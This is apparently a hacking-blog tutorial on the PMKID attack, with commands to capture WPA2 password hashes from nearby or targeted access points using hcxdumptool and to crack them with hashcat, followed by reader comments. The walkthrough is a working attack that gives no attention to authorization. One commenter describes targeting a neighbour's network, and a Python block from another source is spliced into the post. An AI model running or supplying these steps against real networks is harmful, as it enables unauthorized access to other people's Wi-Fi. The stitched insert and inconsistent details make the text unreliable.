otw

Wi-Fi Hacking, Part 11: The PMKID Attack

Updated: Feb 17, 2023

Welcome back, my aspiring cyber warriors!

As you know, the key to hacking the WPA2-PSK is to capture the PSK (pre-shared key or password) as it passes through the air in the 4-way handshake between the client and the AP (you must be in monitor mode to do so). This requires that we either wait for a client to connect to the AP or if a client has already connected, then we bump the client off (de-authenticate) the AP and wait for them to re-connect.

What if we could skip that step and get the password hash directly from the AP? That is exactly what the PMKID attack is!

This new technique (August 2018) was developed by the security researchers at hashcat, the fast Linux-based password cracking tool. They were conducting research on Wi-Fi hacking with the tools included in the hcxtools repository when they found something interesting. They found that they could pull information directly from the AP that included the PSK without a client connecting to the AP!

Let's see how this tool works and use it on some APs.

Step #1: Download and Install hcxdumptool

The tools we need for this hack are not built into Kali but we can get them from

First, we need to download hcxtools.

Next, download hcxdumptool.

Once it has downloaded, we then need to make and install each of these tools.

Navigate to the new hcxdumptool directory.

kali > cd hcxdumptool

Then run make and make install

kali > make

kali > make install

Then navigate to the hcxtools directory and do the same.

kali > cd hcxtools

kali > make

kali > make install

Step #2: Place your wireless adapter into monitor mode with airmon-ng

Next, we need to start airmon-ng from the aircrack-ng suite of Wi-Fi hacking tools to put our wireless adapter into monitor mode.

kali > airmon-ng start wlan0

Note that when airmon-ng starts it will rename your wireless card from wlan0 to wlan0mon.

Now, start airodump-ng on the wireless adapter in monitor mode.

kali > airodump-ng wlan0mon

Step #3: Use hcxdumptool to Capture the PMKID

The next step is to use hcxdumptool to go out to the Wi-Fi APs and grab the PMKID that contains the PSK (pre-shared key or password).

kali > hcxdumptool -i wlan0mon -o Hackers-ArisePMKID --enable_status=1


-i indicates the Wi-Fi adapter (wlan0mon in this case)

-o is for output. This is a file you designate to write the PMKID to


Now, run the command and be patient. In some cases, it may take hours to grab all the PMKIDs. As you can see in the screenshot above, hcxdumptool is grabbing and enumerating each PMKID for each AP in the area.

Step #4: Capturing a Single PMKID

In most cases, you probably will not want to grab all the PMKIDs in the area, but rather target one specifically. We can do this by adding a filter for the BSSID of the target AP.

To do so, you will need to create a text file with only the BSSID of the target AP, without any colons or commas. You can do this using the cat command, such as:

kali > cat > targetBSSID


Use CTRL+D to exit cat. Make certain that the second line contains the target BSSID and nothing else.

This now creates a simple text file of the target BSSID that hcxdumptool can read.

Now, to use this filter for a single AP, we simply append a few options onto our previous command. Most importantly, we add



These two options tell hcxdumptool to use the AP BSSID as a filter and only capture the PMKID from that single AP.

kali > hcxdumptool -i wlan0mon -o Hackers-ArisePMKID --enable_status=1 --filterlist_ap=targetBSSID --filtermode=2

Note that after a while (in some cases, hours), hcxdumptool was able to capture the PMKID of the single target AP and place it into our file "Hackers-ArisePMKID"!

Step #5: Strip Out All the Extraneous Data in the PMKID

The PMKID contains the hash of the PSK, but also a lot of other information we don't need or want. We need to strip out that data, leaving us just the hash of the PSK, before we can start cracking the hash. To do this, we need hcxpcaptool, which is part of the hcxtools group of tools we downloaded earlier.

Navigate to the hcxtools directory.

kali > cd hcxtools

Now, we use hcxpcaptool to strip out all the other information in that file, leaving us with just the PSK hash.

kali > hcxpcaptool -z hashoutput.txt Hackers-ArisePMKID

This will now leave us with the PSK hash in the file we designated here after the -z option, hashoutput.txt

Step #6: Crack the Hash!

Our final step is to crack the hash. We can do that with any of the password cracking tools in our arsenal including john, hashcat and many others. Here, I'll use hashcat to crack it using the top 10,000 passwords as my wordlist.

kali > hashcat -m 16800 hashoutput.txt top100000password.txt


hashcat is the password hash cracking tool

-m 16800 designates the type of hash

hashoutput.txt is the file containing the stripped out PSK hash

top100000password.txt is a plain text file containing the 10,000 most common passwords
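What the hash in hashoutput.txt actually is, as an added example that is not part of the original post: the PMKID is a keyed hash derived from the passphrase, SSID and the two MAC addresses, so an administrator can check their own AP's passphrase against a captured line. The PMKID*AP_MAC*CLIENT_MAC*ESSID hex layout is hashcat's mode 16800 format (not shown on the page), and the SSID, MAC addresses and passphrase below are constructed lab values.

```python
import hashlib
import hmac

def derive_pmk(passphrase: str, ssid: bytes) -> bytes:
    """WPA2-PSK PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)

def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = first 16 bytes of HMAC-SHA1(PMK, "PMK Name" | AP MAC | client MAC)."""
    msg = b"PMK Name" + ap_mac + sta_mac
    return hmac.new(pmk, msg, hashlib.sha1).digest()[:16]

def parse_16800(line: str) -> dict:
    """Split one line of the form PMKID*AP_MAC*CLIENT_MAC*ESSID (all hex)."""
    fields = line.strip().split("*")
    if len(fields) != 4:
        raise ValueError("expected four '*'-separated hex fields")
    pmkid, ap_mac, sta_mac, essid = (bytes.fromhex(f) for f in fields)
    if (len(pmkid), len(ap_mac), len(sta_mac)) != (16, 6, 6):
        raise ValueError("PMKID must be 16 bytes and each MAC 6 bytes")
    if not 1 <= len(essid) <= 32:
        raise ValueError("ESSID must be 1 to 32 bytes")
    return {"pmkid": pmkid, "ap_mac": ap_mac, "sta_mac": sta_mac, "essid": essid}

def matches_passphrase(line: str, passphrase: str) -> bool:
    """True if the PMKID on this line was derived from the given passphrase."""
    rec = parse_16800(line)
    pmk = derive_pmk(passphrase, rec["essid"])
    expected = compute_pmkid(pmk, rec["ap_mac"], rec["sta_mac"])
    return hmac.compare_digest(expected, rec["pmkid"])

# Constructed lab values (not taken from any real network).
SSID = b"LabNet"
AP_MAC = bytes.fromhex("02aabbccdd01")
STA_MAC = bytes.fromhex("02aabbccdd02")
OWN_PASSPHRASE = "correct horse battery staple"
SAMPLE_LINE = "*".join(
    part.hex()
    for part in (compute_pmkid(derive_pmk(OWN_PASSPHRASE, SSID), AP_MAC, STA_MAC),
                 AP_MAC, STA_MAC, SSID)
)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("own passphrase matches:", matches_passphrase(SAMPLE_LINE, OWN_PASSPHRASE))
    print("other passphrase matches:", matches_passphrase(SAMPLE_LINE, "password123"))
```

Every input except the passphrase is visible on the captured line, so the length and randomness of the passphrase is the control that matters on a PSK network.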


The new PMKID attack (August 2018) provides us with one more method of attacking WPA2-PSK enabled Wi-Fi APs. The beauty of this attack is that it doesn't require us to wait for a client to connect and associate or to deauthenticate a client. In my tests, 80-90% of wireless APs will respond with the PMKID when probed with hcxdumptool.





The make command is giving me some trouble. When I run it inside the hcxdumptools folder it says:

mkdir -p .deps

make: pkg-config: No such file or directory

make: pkg-config: No such file or directory

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxdumptool.d -o hcxdumptool hcxdumptool.c -DVERSION_TAG=\"6.2.5-26-g7dc1cc4\" -DVERSION_YEAR=\"2021\"

hcxdumptool.c:41:10: fatal error: openssl/conf.h: No such file or directory

41 | #include <openssl/conf.h>

| ^~~~~~~~~~~~~~~~

compilation terminated.

make: *** [Makefile:74: hcxdumptool] Error 1


Good review.

After two weeks of searching how to hack wifi, I noticed that the most important thing of all is the wordlist. If you try to hack your neighbour's wifi password you must have his password in a wordlist, otherwise you won't find it. Perhaps trying the evil twin method is better for this purpose.

Does anybody know others?? Please reply

Replying to

Attempting to hack your neighbor's wifi is both unethical and illegal.


Money under €1? For example 100000000000? Send?
